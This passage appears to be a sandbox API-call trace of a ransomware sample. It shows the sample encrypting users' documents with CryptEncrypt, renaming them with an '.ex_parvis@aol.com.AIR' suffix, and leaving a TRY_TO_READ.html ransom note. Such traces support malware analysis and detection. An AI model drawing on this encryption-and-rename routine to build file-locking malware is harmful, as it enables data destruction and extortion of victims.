	[0099.994] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x4b01
	[0099.994] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.994] GetProcessHeap () returned 0x540000
	[0099.994] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0099.994] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.994] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.995] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.995] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.995] ReadFile (in: hFile=0x380, lpBuffer=0x603bb8, nNumberOfBytesToRead=0x4b01, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603bb8*, lpNumberOfBytesRead=0x3a1f778*=0x4b01, lpOverlapped=0x0) returned 1
	[0099.996] SetFilePointer (in: hFile=0x380, lDistanceToMove=-19201, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.996] WriteFile (in: hFile=0x380, lpBuffer=0x6086c8*, nNumberOfBytesToWrite=0x4b01, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6086c8*, lpNumberOfBytesWritten=0x3a1f778*=0x4b01, lpOverlapped=0x0) returned 1
	[0099.997] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0099.997] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0099.997] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx", dwFileAttributes=0x80) returned 1
	[0099.998] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx") returned 60
	[0099.998] GetProcessHeap () returned 0x540000
	[0099.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x598b60
	[0099.998] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx"
	[0099.998] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.998] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aawnmujrb-y dw.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aawnmujrb-y dw.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.008] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aAwNMUJrb-y Dw.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aawnmujrb-y dw.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0100.008] GetProcessHeap () returned 0x540000
	[0100.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.008] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=46853) returned 1
	[0100.008] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xb705
	[0100.008] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.008] GetProcessHeap () returned 0x540000
	[0100.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.008] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.009] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.009] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.009] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.010] ReadFile (in: hFile=0x380, lpBuffer=0x603bb8, nNumberOfBytesToRead=0xb705, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603bb8*, lpNumberOfBytesRead=0x3a1f778*=0xb705, lpOverlapped=0x0) returned 1
	[0100.011] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.011] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.011] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx", dwFileAttributes=0x80) returned 1
	[0100.011] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx") returned 50
	[0100.011] GetProcessHeap () returned 0x540000
	[0100.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xca) returned 0x59d258
	[0100.011] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx"
	[0100.011] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.011] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3ndq.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3ndq.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.013] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3NDq.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3ndq.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0100.013] GetProcessHeap () returned 0x540000
	[0100.013] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.013] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=82736) returned 1
	[0100.013] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x14330
	[0100.013] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.013] GetProcessHeap () returned 0x540000
	[0100.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.014] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.014] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.014] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.015] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.015] ReadFile (in: hFile=0x380, lpBuffer=0x603bb8, nNumberOfBytesToRead=0x14330, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603bb8*, lpNumberOfBytesRead=0x3a1f778*=0x14330, lpOverlapped=0x0) returned 1
	[0100.017] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.017] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.017] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx", dwFileAttributes=0x80) returned 1
	[0100.017] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx") returned 58
	[0100.017] GetProcessHeap () returned 0x540000
	[0100.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x598b60
	[0100.017] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx"
	[0100.017] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.017] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-hipeppitxm4.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-hipeppitxm4.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.020] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-HipEppITXm4.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-hipeppitxm4.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0100.020] GetProcessHeap () returned 0x540000
	[0100.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0100.020] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=42186) returned 1
	[0100.020] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa4ca
	[0100.020] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.020] GetProcessHeap () returned 0x540000
	[0100.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.020] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.020] WriteFile (in: hFile=0x380, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.021] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.021] WriteFile (in: hFile=0x380, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.021] ReadFile (in: hFile=0x380, lpBuffer=0x603bb8, nNumberOfBytesToRead=0xa4ca, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603bb8*, lpNumberOfBytesRead=0x3a1f778*=0xa4ca, lpOverlapped=0x0) returned 1
	[0100.021] SetFilePointer (in: hFile=0x380, lDistanceToMove=-42186, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.021] WriteFile (in: hFile=0x380, lpBuffer=0x60e090*, nNumberOfBytesToWrite=0xa4ca, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60e090*, lpNumberOfBytesWritten=0x3a1f778*=0xa4ca, lpOverlapped=0x0) returned 1
	[0100.023] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da570
	[0100.023] FindNextFileW (in: hFindFile=0x5da570, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.023] FindNextFileW (in: hFindFile=0x5da570, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.023] FindNextFileW (in: hFindFile=0x5da570, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca740790, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.023] FindNextFileW (in: hFindFile=0x5da570, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca740790, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.024] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.024] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.024] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.024] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 52
	[0100.024] GetProcessHeap () returned 0x540000
	[0100.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xce) returned 0x59d258
	[0100.024] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini"
	[0100.024] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.024] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.027] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c
	[0100.027] GetProcessHeap () returned 0x540000
	[0100.027] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.027] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=282) returned 1
	[0100.027] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x11a
	[0100.027] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.027] GetProcessHeap () returned 0x540000
	[0100.027] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.027] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.028] WriteFile (in: hFile=0x49c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.028] WriteFile (in: hFile=0x49c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.028] WriteFile (in: hFile=0x49c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.029] ReadFile (in: hFile=0x49c, lpBuffer=0x57fb28, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x57fb28*, lpNumberOfBytesRead=0x3a1f778*=0x11a, lpOverlapped=0x0) returned 1
	[0100.029] SetFilePointer (in: hFile=0x49c, lDistanceToMove=-282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.029] WriteFile (in: hFile=0x49c, lpBuffer=0x56b448*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56b448*, lpNumberOfBytesWritten=0x3a1f778*=0x11a, lpOverlapped=0x0) returned 1
	[0100.029] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da5b0
	[0100.029] FindNextFileW (in: hFindFile=0x5da5b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.029] FindNextFileW (in: hFindFile=0x5da5b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
